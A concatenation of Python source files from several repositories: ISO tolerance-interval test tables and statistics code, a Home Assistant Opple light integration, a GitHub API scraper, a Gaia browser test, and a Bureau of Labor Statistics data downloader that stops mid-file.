factor_k5 = factor_k5.reshape(sample_size.size, number_of_samples.size)
class TestIsoF2(BaseTestIso.TestIsoTableF):
coverage = 0.95
confidence = 0.90
# This is n from the table.
sample_size = np.array([
3, 9, 15, 30, 90, 150, 400, 1000, np.inf,
])
# This is m from the table.
number_of_samples = np.arange(1, 11)
factor_k5 = np.array([
# n = 3
6.8233, 4.3320, 3.7087, 3.4207, 3.2528,
3.1420, 3.0630, 3.0038, 2.9575, 2.9205,
# n = 9
3.1323, 2.7216, 2.5773, 2.5006, 2.4521,
2.4182, 2.3931, 2.3737, 2.3581, 2.3454,
# n = 15
2.7196, 2.4718, 2.3789, 2.3280, 2.2951,
2.2719, 2.2545, 2.2408, 2.2298, 2.2206,
# n = 30
2.4166, 2.2749, 2.2187, 2.1870, 2.1662,
2.1513, 2.1399, 2.1309, 2.1236, 2.1175,
# n = 90
2.1862, 2.1182, 2.0898, 2.0733, 2.0624,
2.0544, 2.0482, 2.0433, 2.0393, 2.0360,
# n = 150
2.1276, 2.0775, 2.0563, 2.0439, 2.0356,
2.0296, 2.0249, 2.0212, 2.0181, 2.0155,
# n = 400
2.0569, 2.0282, 2.0158, 2.0085, 2.0035,
1.9999, 1.9971, 1.9949, 1.9930, 1.9915,
# n = 1000
2.0193, 2.0018, 1.9942, 1.9897, 1.9866,
1.9844, 1.9826, 1.9812, 1.9800, 1.9791,
# n = infinity
1.9600, 1.9600, 1.9600, 1.9600, 1.9600,
1.9600, 1.9600, 1.9600, 1.9600, 1.9600,
])
factor_k5 = factor_k5.reshape(sample_size.size, number_of_samples.size)
class TestIsoF3(BaseTestIso.TestIsoTableF):
coverage = 0.99
confidence = 0.90
# This is n from the table.
sample_size = np.array([
4, 8, 17, 28, 100, 300, 1000, np.inf,
])
# This is m from the table.
number_of_samples = np.arange(1, 11)
factor_k5 = np.array([
# n = 4
6.3722, 4.6643, 4.1701, 3.9277, 3.7814,
3.6825, 3.6108, 3.5562, 3.5131, 3.4782,
# n = 8
4.2707, 3.6541, 3.4408, 3.3281, 3.2572,
3.2078, 3.1712, 3.1428, 3.1202, 3.1016,
# n = 17
3.4741, 3.1819, 3.0708, 3.0095, 2.9698,
2.9416, 2.9204, 2.9037, 2.8902, 2.8791,
# n = 28
3.2023, 3.0062, 2.9286, 2.8850, 2.8564,
2.8358, 2.8203, 2.8080, 2.7980, 2.7896,
# n = 100
2.8548, 2.7710, 2.7358, 2.7155, 2.7018,
2.6919, 2.6843, 2.6782, 2.6732, 2.6690,
# n = 300
2.7249, 2.6806, 2.6616, 2.6504, 2.6429,
2.6374, 2.6331, 2.6297, 2.6269, 2.6245,
# n = 1000
2.6538, 2.6308, 2.6208, 2.6148, 2.6108,
2.6079, 2.6056, 2.6037, 2.6022, 2.6009,
# n = infinity
2.5759, 2.5759, 2.5759, 2.5759, 2.5759,
2.5759, 2.5759, 2.5759, 2.5759, 2.5759,
])
factor_k5 = factor_k5.reshape(sample_size.size, number_of_samples.size)
class TestIsoF4(BaseTestIso.TestIsoTableF):
coverage = 0.90
confidence = 0.95
# This is n from the table.
sample_size = np.array([
2, 8, 16, 35, 150, 500, 1000, np.inf,
])
# This is m from the table.
number_of_samples = np.arange(1, 11)
factor_k5 = np.array([
# n = 2
31.0923, 8.7252, 5.8380, 4.7912, 4.2571,
3.9341, 3.7179, 3.5630, 3.4468, 3.3565,
# n = 8
3.1561, 2.5818, 2.3937, 2.2974, 2.2381,
2.1978, 2.1685, 2.1463, 2.1289, 2.1149,
# n = 16
2.4486, 2.1771, 2.0777, 2.0241, 1.9899,
1.9661, 1.9483, 1.9346, 1.9237, 1.9147,
# n = 35
2.0943, 1.9515, 1.8953, 1.8638, 1.8432,
1.8285, 1.8174, 1.8087, 1.8016, 1.7957,
# n = 150
1.8260, 1.7710, 1.7478, 1.7344, 1.7254,
1.7188, 1.7137, 1.7097, 1.7064, 1.7036,
# n = 500
1.7374, 1.7098, 1.6979, 1.6908, 1.6861,
1.6826, 1.6799, 1.6777, 1.6760, 1.6744,
# n = 1000
1.7088, 1.6898, 1.6816, 1.6767, 1.6734,
1.6709, 1.6690, 1.6675, 1.6663, 1.6652,
# n = infinity
1.6449, 1.6449, 1.6449, 1.6449, 1.6449,
1.6449, 1.6449, 1.6449, 1.6449, 1.6449,
])
factor_k5 = factor_k5.reshape(sample_size.size, number_of_samples.size)
class TestIsoF5(BaseTestIso.TestIsoTableF):
coverage = 0.95
confidence = 0.95
# This is n from the table.
sample_size = np.array([
5, 10, 26, 90, 200, 1000, np.inf,
])
# This is m from the table.
number_of_samples = np.arange(1, 11)
factor_k5 = np.array([
# n = 5
5.0769, 3.6939, 3.2936, 3.0986, 2.9820,
2.9041, 2.8482, 2.8062, 2.7734, 2.7472,
# n = 10
3.3935, 2.8700, 2.6904, 2.5964, 2.5377,
2.4973, 2.4677, 2.4450, 2.4271, 2.4125,
# n = 26
2.6188, 2.4051, 2.3227, 2.2771, 2.2476,
2.2266, 2.2108, 2.1985, 2.1886, 2.1803,
# n = 90
2.2519, 2.1622, 2.1251, 2.1037, 2.0895,
2.0792, 2.0713, 2.0650, 2.0598, 2.0555,
# n = 200
2.1430, 2.0877, 2.0642, 2.0505, 2.0413,
2.0346, 2.0294, 2.0253, 2.0219, 2.0190,
# n = 1000
2.0362, 2.0135, 2.0037, 1.9979, 1.9939,
1.9910, 1.9888, 1.9870, 1.9855, 1.9842,
# n = infinity
1.9600, 1.9600, 1.9600, 1.9600, 1.9600,
1.9600, 1.9600, 1.9600, 1.9600, 1.9600,
])
factor_k5 = factor_k5.reshape(sample_size.size, number_of_samples.size)
class TestIsoF6(BaseTestIso.TestIsoTableF):
coverage = 0.99
confidence = 0.95
# This is n from the table.
sample_size = np.array([
3, 9, 17, 35, 100, 500, np.inf,
])
# This is m from the table.
number_of_samples = np.arange(1, 11)
factor_k5 = np.array([
# n = 3
12.6472, 6.8474, 5.5623, 4.9943, 4.6711,
4.4612, 4.3133, 4.2032, 4.1180, 4.0500,
# n = 9
4.6329, 3.8544, 3.5909, 3.4534, 3.3677,
3.3085, 3.2651, 3.2317, 3.2052, 3.1837,
# n = 17
3.7606, 3.3572, 3.2077, 3.1264, 3.0743,
3.0377, 3.0104, 2.9892, 2.9722, 2.9582,
# n = 35
3.2762, 3.0522, 2.9638, 2.9143, 2.8818,
2.8586, 2.8411, 2.8273, 2.8161, 2.8068,
# n = 100
2.9356, 2.8253, 2.7794, 2.7529, 2.7352,
2.7224, 2.7126, 2.7048, 2.6984, 2.6930,
# n = 500
2.7208, 2.6775, 2.6588, 2.6478, 2.6403,
2.6349, 2.6307, 2.6273, 2.6245, 2.6221,
# n = infinity
2.5759, 2.5759, 2.5759, 2.5759, 2.5759,
2.5759, 2.5759, 2.5759, 2.5759, 2.5759,
])
factor_k5 = factor_k5.reshape(sample_size.size, number_of_samples.size)
class TestIsoF7(BaseTestIso.TestIsoTableF):
coverage = 0.90
confidence = 0.99
# This is n from the table.
sample_size = np.array([
4, 10, 22, 80, 200, 1000, np.inf,
])
# This is m from the table.
number_of_samples = np.arange(1, 11)
factor_k5 = np.array([
# n = 4
9.4162, 4.9212, 3.9582, 3.5449, 3.3166,
3.1727, 3.0742, 3.0028, 2.9489, 2.9068,
# n = 10
3.6167, 2.8193, 2.5709, 2.4481, 2.3748,
2.3265, 2.2923, 2.2671, 2.2477, 2.2324,
# n = 22
2.5979, 2.2631, 2.1429, 2.0791, 2.0393,
2.0120, 1.9921, 1.9770, 1.9652, 1.9558,
# n = 80
2.0282, 1.9056, 1.8562, 1.8281, 1.8097,
1.7964, 1.7864, 1.7785, 1.7721, 1.7668,
# n = 200
1.8657, 1.7973, 1.7686, 1.7520, 1.7409,
1.7328, 1.7266, 1.7216, 1.7176, 1.7142,
# n = 1000
1.7359, 1.7086, 1.6967, 1.6897, 1.6850,
1.6815, 1.6788, 1.6767, 1.6749, 1.6734,
# n = infinity
1.6449, 1.6449, 1.6449, 1.6449, 1.6449,
1.6449, 1.6449, 1.6449, 1.6449, 1.6449,
])
factor_k5 = factor_k5.reshape(sample_size.size, number_of_samples.size)
class TestIsoF8(BaseTestIso.TestIsoTableF):
coverage = 0.95
confidence = 0.99
# This is n from the table.
sample_size = np.array([
2, 9, 17, 40, 150, 500, np.inf,
])
# This is m from the table.
number_of_samples = np.arange(1, 11)
factor_k5 = np.array([
# n = 2
182.7201, 23.1159, 11.9855, 8.7010, 7.1975,
6.3481, 5.8059, 5.4311, 5.1573, 4.9489,
# n = 9
4.5810, 3.4807, 3.1443, 2.9784, 2.8793,
2.8136, 2.7670, 2.7324, 2.7057, 2.6846,
# n = 17
3.3641, 2.8501, 2.6716, 2.5784, 2.5207,
2.4814, 2.4529, 2.4314, 2.4147, 2.4013,
# n = 40
2.6836, 2.4425, 2.3498, 2.2987, 2.2658,
2.2427, 2.2254, 2.2120, 2.2013, 2.1926,
# n = 150
2.2712, 2.1740, 2.1336, 2.1103, 2.0948,
2.0835, 2.0749, 2.0681, 2.0625, 2.0578,
# n = 500
2.1175, 2.0697, 2.0492, 2.0372, 2.0291,
2.0231, 2.0185, 2.0149, 2.0118, 2.0093,
# n = infinity
1.9600, 1.9600, 1.9600, 1.9600, 1.9600,
1.9600, 1.9600, 1.9600, 1.9600, 1.9600,
])
factor_k5 = factor_k5.reshape(sample_size.size, number_of_samples.size)
class TestIsoF9(BaseTestIso.TestIsoTableF):
coverage = 0.99
confidence = 0.99
# This is n from the table.
sample_size = np.array([
3, 7, 15, 28, 70, 200, 1000, np.inf,
])
# This is m from the table.
number_of_samples = np.arange(1, 11)
factor_k5 = np.array([
# n = 3
28.5857, 10.6204, 7.6599, 6.4888, 5.8628,
5.4728, 5.2065, 5.0131, 4.8663, 4.7512,
# n = 7
7.1908, 5.0656, 4.4559, 4.1605, 3.9847,
3.8678, 3.7844, 3.7220, 3.6736, 3.6350,
# n = 15
4.6212, 3.8478, 3.5825, 3.4441, 3.3581,
3.2992, 3.2564, 3.2238, 3.1983, 3.1777,
# n = 28
3.8042, 3.3792, 3.2209, 3.1350, 3.0801,
3.0418, 3.0135, 2.9916, 2.9742, 2.9600,
# n = 70
3.2284, 3.0179, 2.9334, 2.8857, 2.8544,
2.8319, 2.8150, 2.8016, 2.7908, 2.7818,
# n = 200
2.9215, 2.8144, 2.7695, 2.7434, 2.7260,
2.7133, 2.7036, 2.6958, 2.6894, 2.6841,
# n = 1000
2.7184, 2.6756, 2.6570, 2.6461, 2.6387,
2.6332, 2.6290, 2.6257, 2.6229, 2.6205,
# n = infinity
2.5759, 2.5759, 2.5759, 2.5759, 2.5759,
2.5759, 2.5759, 2.5759, 2.5759, 2.5759,
])
factor_k5 = factor_k5.reshape(sample_size.size, number_of_samples.size)
```
#### File: toleranceinterval/twoside/_normal_approx.py
```python
r"""
Algorithms for computing approximate two-sided statistical tolerance interval
factors under the assumption of a normal distribution.
"""
import numpy as np
from scipy.stats import norm, chi2
def tolerance_factor_howe(n, p, g, m=None, nu=None):
r"""
Compute two-side central tolerance interval factor using Howe's method.
Computes the two-sided tolerance interval (TI) factor under a normal
distribution assumption using Howe's method. This follows the derivation
in [1]. This is an approximation, and does not represent the exact TI.
Parameters
----------
n : scalar
Sample size.
p : float
Percentile for central TI to estimate.
g : float
Confidence level where g > 0. and g < 1.
m : scalar
Number of independent random samples (of size n). If None,
default value is m = 1.
nu : scalar
Degrees of freedom for distribution of the (pooled) sample
variance. If None, default value is nu = m*(n-1).
Returns
-------
float
The calculated tolerance factor for the tolerance interval.
References
----------
[1] <NAME>. (1969). "Two-sided Tolerance Limits for Normal
Populations - Some Improvements", Journal of the American Statistical
Association, 64 , pages 610-620.
"""
# Handle defaults for keyword inputs.
if m is None:
m = 1
if nu is None:
nu = m * (n - 1)
alpha = 1.0 - g
zp = norm.ppf((1.0 + p) / 2.0)
u = zp * np.sqrt(1.0 + (1.0 / n))
chi2_nu = chi2.ppf(alpha, df=nu)
v = np.sqrt(nu / chi2_nu)
k = u * v
return k
def tolerance_factor_guenther(n, p, g, m=None, nu=None):
r"""
Compute two-side central tolerance interval factor using Guenther's method.
Computes the two-sided tolerance interval (TI) factor under a normal
distribution assumption using Guenthers's method. This follows the
derivation in [1]. This is an approximation, and does not represent the
exact TI.
Parameters
----------
n : scalar
Sample size.
p : float
Percentile for central TI to estimate.
g : float
Confidence level where g > 0. and g < 1.
m : scalar
Number of independent random samples (of size n). If None,
default value is m = 1.
nu : scalar
Degrees of freedom for distribution of the (pooled) sample
variance. If None, default value is nu = m*(n-1).
Returns
-------
float
The calculated tolerance factor for the tolerance interval.
References
----------
[1] <NAME>. (1977). "Sampling Inspection in Statistical Quality
Control", Griffin's Statistical Monographs, Number 37, London.
"""
# Handle defaults for keyword inputs.
if m is None:
m = 1
if nu is None:
nu = m * (n - 1)
k = tolerance_factor_howe(n, p, g, m, nu)
alpha = 1.0 - g
chi2_nu = chi2.ppf(alpha, df=nu)
w = np.sqrt(1.0 + ((n - 3.0 - chi2_nu) / (2.0 * (n + 1.0) ** 2)))
k *= w
return k
```
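These helpers back the `method='howe'` and `method='guenther'` branches of the public `normal_factor` function defined in `twoside.py` below; a quick comparison sketch (no particular factor values asserted):
```python
import toleranceinterval.twoside as ts

for method in ('exact', 'howe', 'guenther'):
    k = ts.normal_factor(30, 0.95, 0.95, method=method)
    print(method, k)
```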
#### File: toleranceinterval/twoside/twoside.py
```python
import numpy as np
from ..checks import numpy_array, assert_2d_sort
from . import _normal_exact as exact
from . import _normal_approx as approx
def normal_factor(n, p, g, method=None, m=None, nu=None, d2=None,
simultaneous=False, tailprob=False):
r"""
Compute two-sided central tolerance factor using the normal distribution.
Computes the tolerance factor k for the two-sided central tolerance
interval (TI) to cover a proportion p of the population with confidence g:
TI = [Xmean - k * S, Xmean + k * S]
where Xmean = mean(X), S = std(X), X = [X_1,...,X_n] is a random sample
of size n from the distribution N(mu,sig2) with unknown mean mu and
variance sig2.
The tolerance factor k is determined such that the tolerance intervals
with confidence g cover at least the coverage fraction
of the distribution N(mu,sigma^2), i.e.
Prob[ Prob( Xmean - k * S < X < Xmean + k * S ) >= p ] = g,
for X ~ N(mu,sig2) which is independent of Xmean and S.
By default, this function uses an 'exact' method for computing the factor
by Gauss-Kronod quadrature as described in the references [1,2,4]. There
are also two approximate methods implemented: the 'howe' method as
described in [5], and the 'guenther' method as described in [6]. A brief
overview of both approximate methods can be found at NIST's website:
https://www.itl.nist.gov/div898/handbook/prc/section2/prc263.htm
Additional optional parameters are available to consider pooled variance
studies when m random samples of size n are available. Furthermore,
for the 'exact' method, optional parameters are available to
consider simultaneous tolerance intervals as described in [7,8].
If S is a pooled estimator of sig, based on m random samples of size n,
normal_factor computes the tolerance factor k for the two-sided p-content
and g-confidence tolerance intervals
TI = [Xmean_i - k * S, Xmean_i + k * S], for i = 1,...,m
where Xmean_i = mean(X_i), X_i = [X_i1,...,X_in] is a random sample of
size n from the distribution N(mu_i,sig2) with unknown mean mu_i and
variance sig2, and S = sqrt(S2), S2 is the pooled estimator of sig2,
S2 = (1/nu) * sum_i=1:m ( sum_j=1:n (X_ij - Xmean_i)^2 )
with nu degrees of freedom, nu = m * (n-1). For the 'exact' method, both
the simultaneous and non-simultaneous cases can be considered.
Parameters
----------
n : scalar
Sample size
p : scalar in the interval [0.0, 1.0]
Coverage (or content) probability,
Prob( Xmean - k * S < X < Xmean + k * S ) >= p
g : scalar in the interval [0.0, 1.0]
Confidence probability,
Prob[ Prob( Xmean-k*S < X < Xmean+k*S ) >= p ] = g.
method : str
Method to use for computing the factor. Available methods are 'exact',
'howe', and 'guenther'. If None, the default method is 'exact'.
m : scalar
Number of independent random samples (of size n). If None,
default value is m = 1.
nu : scalar
Degrees of freedom for distribution of the (pooled) sample
variance S2. If None, default value is nu = m*(n-1).
d2 : scalar
Normalizing constant. For computing the factors of the
non-simultaneous tolerance limits (xx'*betaHat +/- k * S)
for the linear regression y = XX*beta +epsilon, set d2 =
xx'*inv(XX'*XX)*xx.
Typically, in simple linear regression the estimator S2 has
nu = n-2 degrees of freedom. If None, default value is d2 = 1/n.
simultaneous : boolean
Logical flag for calculating the factor for
simultaneous tolerance intervals. If False, normal_factor will
calculate the factor for the non-simultaneous tolerance interval.
Default value is False.
tailprob : boolean
Logical flag for representing the input probabilities
'p' and 'g'. If True, the input parameters are
represented as the tail coverage (i.e. 1 - p) and tail confidence
(i.e. 1 - g). This option is useful if the interest is to
calculate the tolerance factor for extremely large values
of coverage and/or confidence, close to 1, as
e.g. coverage = 1 - 1e-18. Default value is False.
Returns
-------
float
The calculated tolerance factor for the tolerance interval.
References
----------
[1] <NAME>, <NAME>. (2009). Statistical Tolerance Regions:
Theory, Applications, and Computation. John Wiley & Sons, Inc.,
Hoboken, New Jersey. ISBN: 978-0-470-38026-0, 512 pages.
[2] <NAME>. On the exact two-sided tolerance intervals for
univariate normal distribution and linear regression. Austrian
Journal of Statistics 43(4), 2014, 279-92.
http://ajs.data-analysis.at/index.php/ajs/article/viewFile/vol43-4-6/35
[3] ISO 16269-6:2014: Statistical interpretation of data - Part 6:
Determination of statistical tolerance intervals.
[4] <NAME>., <NAME>.: Two-sided tolerance limits of normal
distributions with unknown means and unknown common variability.
MEASUREMENT SCIENCE REVIEW, Volume 3, Section 1, 2003, 75-78.
[5] <NAME>. “Two-Sided Tolerance Limits for Normal Populations,
Some Improvements.” Journal of the American Statistical Association,
vol. 64, no. 326, [American Statistical Association, Taylor & Francis,
Ltd.], 1969, pp. 610–20, https://doi.org/10.2307/2283644.
[6] <NAME>. (1977). "Sampling Inspection in Statistical Quality
Control",, Griffin's Statistical Monographs, Number 37, London.
[7] <NAME> (1990) Simultaneous Tolerance Intervals for Normal
Populations With Common Variance, Technometrics, 32:1, 83-92,
DOI: 10.1080/00401706.1990.10484595
[8] <NAME> & <NAME> (2022). Construction of
simultaneous tolerance intervals for several normal distributions,
Journal of Statistical Computation and Simulation, 92:1, 101-114,
DOI: 10.1080/00949655.2021.1932885
"""
# Handle default method:
if method is None:
method = 'exact'
if method == 'exact':
k = exact.tolerance_factor(n, p, g, m, nu, d2, simultaneous, tailprob)
elif method == 'howe':
k = approx.tolerance_factor_howe(n, p, g, m, nu)
elif method == 'guenther':
k = approx.tolerance_factor_guenther(n, p, g, m, nu)
else:
raise ValueError(
"Invalid method requested. Valid methods are 'exact', 'howe', or "
"'guenther'."
)
return k
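# Illustrative usage (editor's sketch, not part of the original module); the
# keyword names follow the Parameters section above:
#
#   k = normal_factor(n=30, p=0.90, g=0.95)                     # 'exact' method
#   k_howe = normal_factor(n=30, p=0.90, g=0.95, method='howe')
#   # The tolerance interval half-width is then k * S for a sample std S.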
def normal(x, p, g, method=None, pool_variance=False):
r"""
Compute two-sided central tolerance interval using the normal distribution.
Computes the two-sided tolerance interval (TI) to cover a proportion p of
the population with confidence g using the normal distribution. This
follows the standard approach to calculate the interval as a factor of
sample standard deviations away from the sample mean.
TI = [Xmean - k * S, Xmean + k * S]
where Xmean = mean(X), S = std(X), X = [X_1,...,X_n] is a random sample
of size n from the distribution N(mu,sig2) with unknown mean mu and
variance sig2.
By default, this function uses an 'exact' method for computing the TI
by Gauss-Kronrod quadrature. There are also two approximate methods
implemented: the 'howe' method, and the 'guenther' method. See the
documentation for normal_factor for more details on the methods.
Parameters
----------
x : ndarray (1-D, or 2-D)
Numpy array of samples to compute the tolerance interval. Assumed data
type is np.float. Shape of (m, n) is assumed for 2-D arrays with m
number of sets of sample size n.
p : float
Percentile for central TI to cover.
g : float
Confidence level where g > 0. and g < 1.
method : str
Method to use for computing the TI. Available methods are 'exact',
'howe', and 'guenther'. If None, the default method is 'exact'.
pool_variance : boolean
Consider the m random samples to share the same variance such that
the degrees of freedom are nu = m*(n-1). Default is False.
Returns
-------
ndarray (2-D)
The normal distribution tolerance interval bound. Shape (m, 2) from m
sets of samples, where [:, 0] is the lower bound and [:, 1] is the
upper bound.
References
----------
See the documentation for normal_factor for a complete list of references.
Examples
--------
Estimate the 90th percentile central TI with 95% confidence of the
following 100 random samples from a normal distribution.
>>> import numpy as np
>>> import toleranceinterval as ti
>>> x = np.random.normal(size=100)
>>> bound = ti.twoside.normal(x, 0.9, 0.95)
>>> print('Lower bound:', bound[:, 0])
>>> print('Upper bound:', bound[:, 1])
Estimate the 95th percentile central TI with 95% confidence of the
following 100 random samples from a normal distribution.
>>> bound = ti.twoside.normal(x, 0.95, 0.95)
"""
x = numpy_array(x) # check if numpy array, if not make numpy array
x = assert_2d_sort(x)
m, n = x.shape
# Handle pooled variance case
if pool_variance:
_m = m
else:
_m = 1
k = normal_factor(n, p, g, method, _m)
bound = np.zeros((m, 2))
xmu = x.mean(axis=1)
kstd = k * x.std(axis=1, ddof=1)
bound[:, 0] = xmu - kstd
bound[:, 1] = xmu + kstd
return bound
def lognormal(x, p, g, method=None, pool_variance=False):
r"""
Two-sided central tolerance interval using the lognormal distribution.
Computes the two-sided tolerance interval using the lognormal distribution.
This simply applies ln and exp transformations around the normal
distribution method.
Parameters
----------
x : ndarray (1-D, or 2-D)
Numpy array of samples to compute the tolerance interval. Assumed data
type is np.float. Shape of (m, n) is assumed for 2-D arrays with m
number of sets of sample size n.
p : float
Percentile for central TI to estimate.
g : float
Confidence level where g > 0. and g < 1.
method : str
Method to use for computing the TI. Available methods are 'exact',
'howe', and 'guenther'. If None, the default method is 'exact'.
pool_variance : boolean
Consider the m random samples to share the same variance such that
the degrees of freedom are nu = m*(n-1). Default is False.
Returns
-------
ndarray (2-D)
The lognormal distribution tolerance interval bound. Shape (m, 2)
from m sets of samples, where [:, 0] is the lower bound and [:, 1] is
the upper bound.
Examples
--------
Estimate the 90th percentile central TI with 95% confidence of the
following 100 random samples from a lognormal distribution.
>>> import numpy as np
>>> import toleranceinterval as ti
>>> x = np.random.random(100)
>>> bound = ti.twoside.lognormal(x, 0.9, 0.95)
>>> print('Lower bound:', bound[:, 0])
>>> print('Upper bound:', bound[:, 1])
Estimate the 95th percentile central TI with 95% confidence of the
following 100 random samples from a lognormal distribution.
>>> bound = ti.twoside.lognormal(x, 0.95, 0.95)
"""
x = numpy_array(x) # check if numpy array, if not make numpy array
x = assert_2d_sort(x)
return np.exp(normal(np.log(x), p, g, method, pool_variance))
```
|
{
"source": "jedmeng/homeassistant-opple",
"score": 2
}
|
#### File: custom_components/light/opple.py
```python
import logging
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
import homeassistant.util.color as color_util
from homeassistant.components.light import SUPPORT_BRIGHTNESS, SUPPORT_COLOR_TEMP, ATTR_COLOR_TEMP, ATTR_BRIGHTNESS, \
Light, PLATFORM_SCHEMA
from homeassistant.const import CONF_NAME, CONF_HOST
REQUIREMENTS = ['pyoppleio']
_LOGGER = logging.getLogger(__name__)
DEFAULT_NAME = 'opple light'
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_HOST): cv.string,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string
})
def setup_platform(hass, config, add_devices, discovery_info=None):
    name = config.get(CONF_NAME)
    host = config.get(CONF_HOST)
add_devices([OppleLight(name, host)])
class OppleLight(Light):
def __init__(self, name, host):
from pyoppleio.OppleLightDevice import OppleLightDevice
self._device = OppleLightDevice(host)
self._name = name
self._is_on = None
self._brightness = None
self._color_temp = None
_LOGGER.info('Init light %s %s', self._device.ip, self._device.mac)
@property
def available(self):
return self._device.is_online
@property
def name(self):
return self._name
@property
def is_on(self):
return self._is_on
@property
def brightness(self):
return self._brightness
@property
def color_temp(self):
return color_util.color_temperature_kelvin_to_mired(self._color_temp)
@property
def min_mireds(self):
return 175
@property
def max_mireds(self):
return 333
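    # Editor's note: 175-333 mireds corresponds to roughly 5714 K (cool white)
    # down to 3003 K (warm white), since kelvin = 1e6 / mireds.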
@property
def supported_features(self):
return SUPPORT_BRIGHTNESS | SUPPORT_COLOR_TEMP
def turn_on(self, **kwargs):
_LOGGER.debug('Turn on light %s %s', self._device.ip, kwargs)
if not self.is_on:
self._is_on = self._device.power_on = True
if ATTR_BRIGHTNESS in kwargs and self.brightness != kwargs[ATTR_BRIGHTNESS]:
self._brightness = self._device.brightness = kwargs[ATTR_BRIGHTNESS]
        if ATTR_COLOR_TEMP in kwargs and self.color_temp != kwargs[ATTR_COLOR_TEMP]:
self._color_temp = self._device.color_temperature = \
color_util.color_temperature_mired_to_kelvin(kwargs[ATTR_COLOR_TEMP])
def turn_off(self, **kwargs):
self._device.power_on = False
_LOGGER.debug('Turn off light %s', self._device.ip)
def update(self):
self._device.update()
self._is_on = self._device.power_on
self._brightness = self._device.brightness
self._color_temp = self._device.color_temperature
if not self.available:
_LOGGER.info('Light %s is offline', self._device.ip)
elif not self.is_on:
_LOGGER.debug('Update light %s success: power off', self._device.ip)
else:
_LOGGER.debug('Update light %s success: power on brightness %s color temperature %s',
self._device.ip, self._brightness, self._color_temp)
```
|
{
"source": "jedpatrickdatu/github-scraper",
"score": 3
}
|
#### File: github-scraper/githubScraper/GitHub.py
```python
from requests import get
class GitHub:
supportedResources = [
'projects',
'pulls',
'branches',
'collaborators',
'comments',
'forks',
'issues',
'commits',
]
def __init__(self, owner, repos, resources):
self.owner = owner
self.repos = repos
for resource in resources:
if resource not in self.supportedResources:
                print(self.supportedResources)
raise Exception('The value "'+resource+'" passed to the parameter for GitHub resources is unsupported. Please see the documentation for a list of supported values.')
self.resources = resources
self.numRepos = len(repos)
self.numResources = len(resources)
self.currentRepoIndex = 0
self.currentResourceIndex = 0
self.resourcePageIndex = 1
def read(self):
if self.currentRepoIndex >= self.numRepos:
return None
requestUrl = 'https://api.github.com/repos/'+self.owner+'/'+self.repos[self.currentRepoIndex]+'/'+self.resources[self.currentResourceIndex]+'?page='+str(self.resourcePageIndex)
ghData = get(requestUrl).json()
if ghData:
self.resourcePageIndex += 1
else:
self.resourcePageIndex = 1
self.currentResourceIndex += 1
if self.currentResourceIndex >= self.numResources:
self.currentRepoIndex += 1
self.currentResourceIndex = 0
return ghData
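# Example usage (editor's sketch, not part of the original file): read()
# walks every (repo, resource) pair page by page and returns None when all
# repos are exhausted.
#
#   gh = GitHub('octocat', ['hello-world'], ['issues', 'commits'])
#   page = gh.read()
#   while page is not None:
#       print(len(page), 'records fetched')
#       page = gh.read()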
```
|
{
"source": "jedp/gaia",
"score": 2
}
|
#### File: functional/browser/test_browser_navigation.py
```python
from marionette.by import By
from gaiatest import GaiaTestCase
from gaiatest.apps.browser.app import Browser
class TestBrowserNavigation(GaiaTestCase):
_community_link_locator = (By.CSS_SELECTOR, '#community a')
_community_history_section_locator = (By.ID, 'history')
def setUp(self):
GaiaTestCase.setUp(self)
self.connect_to_network()
def test_browser_back_button(self):
browser = Browser(self.marionette)
browser.launch()
browser.go_to_url('http://mozqa.com/data/firefox/layout/mozilla.html')
browser.switch_to_content()
self.verify_home_page()
community_link = self.marionette.find_element(*self._community_link_locator)
# TODO: remove the explicit scroll once bug 833370 is fixed
self.marionette.execute_script("arguments[0].scrollIntoView(false);", [community_link])
community_link.tap()
self.verify_community_page()
browser.switch_to_chrome()
browser.tap_back_button()
browser.switch_to_content()
self.verify_home_page()
browser.switch_to_chrome()
browser.tap_forward_button()
browser.switch_to_content()
self.verify_community_page()
def verify_home_page(self):
self.wait_for_element_present(*self._community_link_locator)
community_link = self.marionette.find_element(*self._community_link_locator)
self.assertTrue(community_link.is_displayed(), 'The community link was not visible at mozilla.html.')
def verify_community_page(self):
self.wait_for_element_present(*self._community_history_section_locator)
history_section = self.marionette.find_element(*self._community_history_section_locator)
self.assertTrue(history_section.is_displayed(), 'The history section was not visible at mozilla_community.html.')
```
|
{
"source": "jedpittman/jobhopper",
"score": 3
}
|
#### File: data/bls/oes_data_downloader.py
```python
from lxml import html
import requests
import pandas as pd
from urllib.request import urlopen
from tempfile import NamedTemporaryFile
import shutil
from shutil import unpack_archive
import os
import logging
log = logging.getLogger()
# TODO: *, #, and ** are not returned as NA
class OESDataDownloader(object):
"""
Download BLS data on Occupational Employment Statistics (OES). Data for various years provided
at https://www.bls.gov/oes/tables.htm
Data format: Zip folder, with a single Excel file containing OES data, at least for 2018 and 2019
"""
def __init__(self, year="2019", tempfile_dir="/tmp/bls_oesm"):
"""
:param year: String indicating the year for the download. Zip names are in
oesm<last 2 digits of year>all.zip format.
:param tempfile_dir: Specify a (temp)file directory
"""
self.base_url = "https://www.bls.gov/"
self.oes_data_url = "https://www.bls.gov/oes/tables.htm"
self.oes_zipname = "oesm{}all".format(year[2:4])
self.tempfile_dir = tempfile_dir
self.year = year
self.oes_download_path = self._get_oes_download_path()
def _get_oes_download_path(self) -> str:
"""
Parse the OES tables page from the BLS site to find the download link for the specified year
"""
log.info("Finding OES data download path from {}".format(self.oes_data_url))
page_data = requests.get(self.oes_data_url)
tree = html.fromstring(page_data.content)
oes_file_href = tree.xpath(
'.//a[contains(@href, "{}")]/@href'.format(
"{}.zip".format(self.oes_zipname)
)
)[0]
oes_download_path = "{}{}".format(self.base_url, oes_file_href)
log.info("Download path: {}".format(oes_download_path))
return oes_download_path
def download_oes_data(self, clean_up=False) -> pd.DataFrame:
"""
Download the zip folder into the tempfile_dir, and load the Excel file
Estimated number of rows: 350K+
"""
log.info("Downloading OES data from {}".format(self.oes_download_path))
# Download the zip folder
with urlopen(self.oes_download_path) as response, NamedTemporaryFile() as tfile:
log.info(f"Files stored temporarily here: {self.tempfile_dir}")
tfile.write(response.read())
tfile.seek(0)
log.info(f"about to unpack file: {tfile.name}")
# Unzip folder + files
unpack_archive(tfile.name, self.tempfile_dir, format="zip")
# BLS OES data filename format
expected_filename = "all_data_M_{}.xlsx".format(self.year)
# Download file
for root, subdirs, files in os.walk(self.tempfile_dir):
log.info("Files found: {}".format(files))
for file in files:
if expected_filename in file:
